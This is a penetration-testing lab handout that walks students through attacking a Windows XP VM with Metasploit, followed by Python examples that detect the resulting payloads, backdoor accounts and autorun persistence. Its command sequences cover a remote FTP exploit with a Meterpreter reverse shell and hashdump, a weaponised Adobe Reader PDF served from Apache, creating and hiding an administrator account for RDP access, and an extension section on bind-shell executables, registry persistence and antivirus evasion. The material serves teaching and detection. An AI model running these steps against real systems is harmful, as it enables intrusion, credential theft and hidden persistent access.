Lab 2 - Metasploit Lab

Metasploit Lab

The Metasploit® Framework is a free, open source framework for developing, testing, and using exploit code developed by the open source community and Rapid7. It is the de-facto standard for penetration testing, with more than one million unique downloads per year, as well as the world's largest public database of quality-assured exploits.

This lab builds on the knowledge gained in previous labs. You are required to know how to enumerate information from a remote server and its services (nmap, openvas, netcat, or any other scanner you feel comfortable using). Once enough information is gathered, the next step in the penetration testing process is to develop an attack plan.

Objective & Turn In

Objective:
● Part 1 - Remote Exploits with Metasploit
  ■ Successfully exploit the victim using a remote exploit included in Metasploit (rooting the victim machine via "physical access" does not count).
  ■ Acquire a text copy of the file containing the hashed passwords of the victim machine.
● Part 2 - Client Side Exploits with Metasploit
  ■ Create a PDF file with malicious code embedded into it.
  ■ Deliver the malicious file to your victim VM via a web page (Backtrack comes with Apache ready for use).
  ■ Create a user account on the victim machine (with administrator privileges).
  ■ Gain access to the victim VM via Remote Desktop Protocol (RDP).

Turn in:
● Part 1 - Remote Exploits with Metasploit
  ■ Hashdump of the victim machine.
  ■ Short write-up of your remote exploit process. For example, state what application you exploited, what payload you used, how you downloaded the hashed passwords, and anything else you think is important. How you go about getting this information depends on your attack plan.
● Part 2 - Client Side Exploits with Metasploit
  ■ Screenshot of the victim's RDP desktop.
  ■ Short write-up of your client side exploit process using the same guidelines as in Part 1 (how it was done, what you used, plus anything else worth mentioning).

Keys to success with this lab:
● Know which ports are open (nmap is your friend).
● Get the version information for the services (nmap --help).
● You can restart the VM to reset the victim machine if your exploit fails.

There are a number of ways to get the hashed passwords. Meterpreter provides a facility that will pull the data for you (type 'help' when in Meterpreter). This method, however, may or may not work for certain exploited applications. The alternative is to get a command prompt (shell) on the victim machine, start a tftp server on your machine, and download pwdump.exe (included in Backtrack; you can find it by running 'locate pwdump' from the terminal). Then execute pwdump.exe on the victim machine, redirecting its output to a file. Once complete, you can upload the results to the Backtrack machine.

Starting the VMs

Windows XP MSF Lab - Windows (VICTIM) - IP => 10.0.0.11
Backtrack5 R2 (ATTACKER) - IP => 10.0.0.10 - username: root - password: toor

1) Start the Windows XP MSF Lab and Backtrack5 R2 VMs.
   - Log in to BT (login info above).
   - Start the GUI interface by typing: startx
   - Enable the shared folder (to transfer data from the VM to the host): mount.vboxsf -w VM_Shared ~/Desktop/VM_Shared
   - Verify that the victim and attacker machines are able to ping each other.
2) Reconnaissance:
   - Determine the operating system fingerprint, any open ports, and the version of the services running on those open ports for the victim machine. This information will be used to determine how to carry out your remote exploit attack (to select your attack vector).

Part 1 - Remote Exploits with Metasploit

Remote exploits abuse vulnerabilities found in a victim's software posture (i.e. system, services or application software) in order to execute malicious code on the victim machine from a remote system (over the network), without prior access to the victim's machine. Metasploit includes numerous local and remote exploits, as well as auxiliary modules. It also provides many different interfaces for interacting with its facilities. For this lab we will focus on msfconsole. First we need to start msfconsole on the Backtrack VM by typing the following in a terminal:
msfconsole

The following is an example of the remote exploit process for a victim running WS FTP Server. Use the information you gathered in the reconnaissance phase to determine which exploit to use for your victim. The first step is to search for an exploit that will work for your target:
search ws_ftp
This query will return a couple of results like below:

Then we select an exploit by typing (this will also change your msf command prompt):
use windows/ftp/wsftp_server_503_mkd
Type the following to examine the exploit options:
show options

The next step is to select a payload. Metasploit includes a vast array of payloads; one of the more popular ones is called Meterpreter. Meterpreter is sort of the Swiss-army knife of payloads, so we will use it for our malicious payload. In order to use a particular payload you must first verify that the payload is available for that particular exploit. Some exploits have only a small landing area and can only hold a small payload. This size value is defined in the Metasploit module.

To determine what payloads are available for the selected exploit, we issue the following command:
show payloads
This should display all the payloads available to the exploit you selected. Let's look for the Meterpreter reverse TCP payload for Windows.
Note: reverse_tcp and bind_tcp are the two most common categories of payloads for remote exploits. Reverse_tcp means: once exploited, connect back to the attacker. Bind_tcp means: open a port on the victim machine, and listen for the attacker's request to connect.
To select the Meterpreter payload enter the following command:
set PAYLOAD windows/meterpreter/reverse_tcp
Then issue a show options to see which options must be defined. The result of this command should look like the following:
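What these two payload categories look like from the victim's side, as an added example written for this page (not code from the lab handout or from Metasploit): a small Python classifier over a constructed `netstat -ano` listing and a constructed PID-to-image map. A bind_tcp payload shows up as an unexpected listening port; a reverse_tcp payload shows up as an outbound connection from a process that should not be talking to the network at all. The expected-port list, process names and addresses are assumptions chosen to resemble the lab VMs.

```python
# Added example, not part of the lab handout: classify sockets on a Windows
# host as bind-style listeners or reverse-style connect-backs, from the
# defender's side. The netstat text and PID->image map are CONSTRUCTED to
# resemble `netstat -ano` and `tasklist` output on the lab's victim VM.
from __future__ import annotations
import re
from dataclasses import dataclass

NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1512
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1512
  TCP    10.0.0.11:1043         10.0.0.10:4444         ESTABLISHED     1820
  TCP    10.0.0.11:1044         10.0.0.10:80           ESTABLISHED     1660
"""

# Constructed PID -> image name map (what `tasklist` would show).
PROCESSES = {4: "System", 880: "svchost.exe", 1512: "FTPServer.exe",
             1660: "iexplore.exe", 1820: "AcroRd32.exe"}

# Document readers should never originate network connections themselves.
DOCUMENT_READERS = {"acrord32.exe", "winword.exe", "excel.exe"}
# Listening ports this host is expected to expose (FTP, RPC, NetBIOS, SMB, RDP).
# Assumption for the example: anything else listening is worth a look.
EXPECTED_LISTENERS = {21, 135, 139, 445, 3389}

LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")


@dataclass
class Finding:
    kind: str    # "bind" (payload listens on the victim) or "reverse" (victim connects out)
    pid: int
    image: str
    local: str
    remote: str


def classify(netstat_text: str, processes: dict[int, str]) -> list[Finding]:
    """Flag unexpected listeners (bind_tcp pattern) and outbound connections
    from document readers (reverse_tcp pattern)."""
    findings: list[Finding] = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or non-TCP entry
        laddr, lport, raddr, rport, state, pid = m.groups()
        lport, pid = int(lport), int(pid)
        image = processes.get(pid, "unknown")
        local, remote = f"{laddr}:{lport}", f"{raddr}:{rport}"
        if state == "LISTENING" and lport not in EXPECTED_LISTENERS:
            # bind_tcp: the payload opened a port and waits for the operator to connect.
            findings.append(Finding("bind", pid, image, local, remote))
        elif state == "ESTABLISHED" and image.lower() in DOCUMENT_READERS:
            # reverse_tcp: a document reader initiated a connection back to the operator.
            findings.append(Finding("reverse", pid, image, local, remote))
    return findings


if __name__ == "__main__":
    for f in classify(NETSTAT_SAMPLE, PROCESSES):
        print(f"{f.kind:8} pid={f.pid:<5} {f.image:14} {f.local} -> {f.remote}")
```

Run against the sample, the 4444 listener owned by the FTP service process and the AcroRd32.exe connection to 10.0.0.10:4444 are reported; the browser's connection to port 80 is not. The second rule is the more durable one: a reverse payload can use any port, but the process that opens the socket is still the exploited application.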

The next step is to select a target (some exploits do not require target selection). To determine whether the selected exploit requires target selection, type:
show targets
Then select the target Id number corresponding to your target system by issuing the following:
set TARGET <Target-ID-Number>

The last step is to set all required options before running the exploit. Verify all required options are defined, such as RHOST and LHOST. RHOST refers to the remote victim's IP address, whereas LHOST stands for our attacking (listening) machine's IP:
set RHOST <victim-IP>
set LHOST <attacker-IP>
Each payload has different required options that must be defined in order for Metasploit to successfully execute. But for this example we are ready to go. To run your exploit simply type:
exploit
To get the hashed passwords within Meterpreter type (turn in a text copy of this output):
hashdump

Part 2 - Client Side Exploits with Metasploit

Client side exploits take advantage of software installed on a network client machine, and require user interaction (such as executing a file, or visiting a malicious website) to successfully cause a breach. We will be using CVE-2008-2992, which affects Adobe Acrobat Reader 8.1.2. We can use Google to search for 'cve-2008-2992 site:securityfocus.com'. This search returns the following page: http://www.securityfocus.com/bid/30035. After reading the vulnerability disclosure bulletin, we discover that the vulnerability involves the util.printf() JavaScript function used by Adobe's Acrobat Reader.
Exit your Meterpreter session. Search for an exploit affecting Adobe and print util, as described in the CVE article:
search adobe_utilprint
Then we select an exploit by typing (this will also change your msf command prompt):
use exploit/windows/fileformat/adobe_utilprintf
We then select the Meterpreter payload as our malicious payload to embed into our PDF file. This is the payload that is executed on the victim's machine when they open the file:
set PAYLOAD windows/meterpreter/reverse_tcp
Type the following to examine the exploit's options:
show options
Next we set all required options (remember that all required options must be defined):
set LHOST <attacker-IP>
set LPORT <listening-port>
set FILENAME whatever-you-want-to-name-your-file.pdf
(do not forget the .pdf extension)

This specific exploit does not require target selection. It will create a PDF file with our embedded payload. Metasploit will not execute the exploit against any specific target. Once all options are set, run the exploit to create your malicious PDF: exploit

Open a new terminal in the Backtrack VM and start the Apache server:
/etc/init.d/apache2 start
Then, in the same terminal, move your exploit (your malicious PDF) to the Apache web root by typing the following:
mv /root/.msf4/local/whatever-you-named-your-file.pdf /var/www
In order to "catch" the payload once the client opens the file, we need a service waiting for the incoming connection. We will use Metasploit's multi-handler to provide this service. Back on the msfconsole terminal, type the following to start the multi-handler:
use exploit/multi/handler

We have to set the type of payload that will be connecting back to the service, the port, and the IP address to listen on:
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT <listening-port>
set LHOST <attacker-IP>
Once all options are set properly, run the handler by typing:
exploit

We are now ready to receive the call-back connection from the victim, which will be made once the user opens our malicious PDF.
On the XP VM (victim):
- Open a web browser.
- Navigate to the attacker's web page (http://10.0.0.10/whatever-you-named-your-file.pdf).
- Open the file.
On Backtrack (attacker):
Once the Meterpreter payload calls back (which can take a minute, so don't panic) and a Meterpreter session is opened, we move on to the post-exploitation phase.

We will now migrate our shell to a stable process in case the victim closes the PDF file. To determine which PID to use, type:
ps -A
(This will display all the processes currently running and the PIDs associated with them.)
To migrate our shell to a stable process, select the PID of a system process (or an essential user process like explorer.exe):
migrate system-process-PID

The final step is to enable Remote Desktop Protocol (RDP) on the victim machine: run getgui -e

Then we drop into a Windows command prompt by typing:
shell
Create a local user account as follows:
net user hacker hacker /add
Add this account to the local Administrators group:
net localgroup Administrators hacker /add
And to the local Remote Desktop Users group, so we can connect via RDP to the victim machine:
net localgroup "Remote Desktop Users" hacker /add
We then hide our malicious user account:
run getgui -u hacker -p hacker
Finally, we connect to the victim machine via RDP, and log in with the credentials we created in the previous steps:
rdesktop victim-IP-address
(Remember to grab the screenshot of the RDP session desktop - Alt + PrtScn)
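The account creation and group changes above leave a trail in the Windows Security log, and that trail survives hiding the account from the logon screen. As an added example (not code from the lab handout), the following Python correlates three event types in a constructed, simplified log export: account created (event ID 4720 on current Windows, 624 in XP-era logs), member added to a security-enabled local group (4732 / 636), and a logon of type 10, which is RemoteInteractive, i.e. RDP (4624 / 528). The CSV layout, timestamps and account names are assumptions made for the example.

```python
# Added example, not part of the lab handout: correlate Windows Security log
# events to find an account that was created, made privileged, and then used
# over RDP within a short window. The log export below is CONSTRUCTED.
from __future__ import annotations
import csv
from datetime import datetime, timedelta
from io import StringIO

# Simplified export: one row per event. "subject" is the account that performed
# the action, "target" the account acted upon. Event IDs 4720/4732/4624 are the
# current ones; 624/636/528 are their Windows XP-era equivalents.
SECURITY_LOG = """\
time,event_id,subject,target,group,logon_type
2012-03-01 10:01:05,4624,SYSTEM,Administrator,,5
2012-03-01 10:14:02,4720,SYSTEM,hacker,,
2012-03-01 10:14:09,4732,SYSTEM,hacker,Administrators,
2012-03-01 10:14:15,4732,SYSTEM,hacker,Remote Desktop Users,
2012-03-01 10:16:40,4624,,hacker,,10
2012-03-01 11:30:00,4720,Administrator,alice,,
2012-03-01 12:00:00,4624,,alice,,2
"""

USER_CREATED = {4720, 624}
GROUP_MEMBER_ADDED = {4732, 636}
LOGON = {4624, 528}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}
RDP_LOGON_TYPE = "10"   # logon type 10 = RemoteInteractive (Terminal Services / RDP)


def parse_events(text: str) -> list[dict]:
    """Parse the CSV export into dicts with typed time and event_id fields."""
    rows = list(csv.DictReader(StringIO(text)))
    for r in rows:
        r["time"] = datetime.strptime(r["time"], "%Y-%m-%d %H:%M:%S")
        r["event_id"] = int(r["event_id"])
    return rows


def find_backdoor_accounts(events: list[dict], window: timedelta = timedelta(hours=1)) -> dict:
    """Return accounts that were created, added to a privileged local group, and
    then logged on over RDP, all within `window` of the creation event."""
    candidates: dict[str, dict] = {}
    for ev in events:
        if ev["event_id"] in USER_CREATED:
            candidates[ev["target"]] = {"created": ev["time"], "created_by": ev["subject"],
                                        "groups": [], "rdp_logon": None}
    for ev in events:
        acct = ev["target"]
        if acct not in candidates:
            continue
        created = candidates[acct]["created"]
        if not (created <= ev["time"] <= created + window):
            continue  # outside the correlation window
        if ev["event_id"] in GROUP_MEMBER_ADDED and ev["group"].lower() in PRIVILEGED_GROUPS:
            candidates[acct]["groups"].append(ev["group"])
        elif ev["event_id"] in LOGON and ev["logon_type"] == RDP_LOGON_TYPE:
            candidates[acct]["rdp_logon"] = ev["time"]
    # Only the full chain (created -> privileged -> RDP logon) is reported.
    return {a: d for a, d in candidates.items() if d["groups"] and d["rdp_logon"]}


if __name__ == "__main__":
    for acct, d in find_backdoor_accounts(parse_events(SECURITY_LOG)).items():
        print(f"{acct}: created {d['created']} by {d['created_by']}, "
              f"groups={d['groups']}, RDP logon at {d['rdp_logon']}")
```

In the sample only "hacker" completes the chain; "alice" is created by an administrator and logs on interactively, so she is not reported. The creating subject is also worth keeping: here it is SYSTEM rather than an interactive administrator, which is what a shell spawned from a migrated system process looks like in the log.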

Extended Learning

If you want to be a ninja, create a payload that is an executable with this command:
msfpayload windows/shell_bind_tcp RHOST=192.168.56.101 X > bind_shell.exe
and upload it somewhere sneaky, then add it to the system start-up. There are a number of ways you can do this. Adding this registry key is one way:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices\trojan.exe
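Run-key persistence of the kind just described is also the easiest kind to audit. As an added example that is not part of the lab handout, here is a Python parser for a `.reg` export of the autorun keys (Run, RunOnce, RunServices, RunServicesOnce) that flags any entry whose executable lives outside the Windows or Program Files directories, and records whether the entry sits under HKEY_CURRENT_USER (writable by the logged-on user) or HKEY_LOCAL_MACHINE. The export text, value names and paths are constructed for the example; the trusted roots are an assumption for a default XP install.

```python
# Added example, not part of the lab handout: audit autorun registry entries
# from a `.reg` export (the format written by `reg export` / regedit).
# The export below is CONSTRUCTED; paths use the .reg escaping (doubled
# backslashes, \" for embedded quotes).
from __future__ import annotations
import re

REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VBoxTray"="C:\\WINDOWS\\system32\\VBoxTray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
"trojan"="\"C:\\Documents and Settings\\hacker\\Local Settings\\Temp\\bind_shell.exe\""
"""

# Key names (last path component) that Windows treats as autorun lists.
AUTORUN_KEY_NAMES = {"run", "runonce", "runservices", "runservicesonce"}
# Assumption for the example: a default XP install keeps its autoruns under these roots.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\")

VALUE_RE = re.compile(r'"([^"]+)"="(.*)"$')
EXE_RE = re.compile(r'([A-Za-z]:\\[^"]*?\.exe)', re.IGNORECASE)


def parse_reg_export(text: str):
    """Yield (key, value_name, data) for every string value in the export,
    with .reg escaping undone."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = VALUE_RE.match(line)
            if m:
                name, data = m.groups()
                yield key, name, data.replace('\\"', '"').replace("\\\\", "\\")


def extract_exe(data: str) -> str:
    """Pull the executable path out of a command line, ignoring quotes and arguments."""
    m = EXE_RE.search(data)
    return m.group(1) if m else data.strip('"')


def audit_autoruns(reg_text: str) -> list[dict]:
    """Return autorun entries whose executable is outside the trusted roots."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if key.rsplit("\\", 1)[-1].lower() not in AUTORUN_KEY_NAMES:
            continue
        exe = extract_exe(data)
        if exe.lower().startswith(TRUSTED_ROOTS):
            continue  # lives where system software is expected to live
        findings.append({
            "key": key,
            "name": name,
            "image": exe,
            "scope": "user" if key.upper().startswith("HKEY_CURRENT_USER") else "machine",
        })
    return findings


if __name__ == "__main__":
    for f in audit_autoruns(REG_EXPORT):
        print(f"[{f['scope']}] {f['key']}\\{f['name']} -> {f['image']}")
```

Only the RunServices entry pointing into a user's Temp directory is reported; VBoxTray and ctfmon under C:\WINDOWS are left alone. A path check like this is a first filter rather than a verdict, so the natural follow-up is to hash the flagged image and compare it with a known-good inventory.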

If you want to be a super sneaky ninja you could instead create a reverse_tcp shell to connect back to you on start up, then restart the victim. While the victim machine restarts be sure to have a listening netcat session on your attacker to accept the reverse shell. You can also try to drop a backdoor as part of your post exploit phase, so you can continue to have access to the victim machine without having to execute the entire exploit process again. Try some different payloads. For example, windows/vncinject/reverse_tcp is a really fun one to run within metasploit. Create a client side exploit that is NOT detectable by antivirus software. The pdf we created in this lab will set off any antivirus application. Metasploit provides an encoder to avoid antivirus detection. You can read more about it on metasploit-unleashed.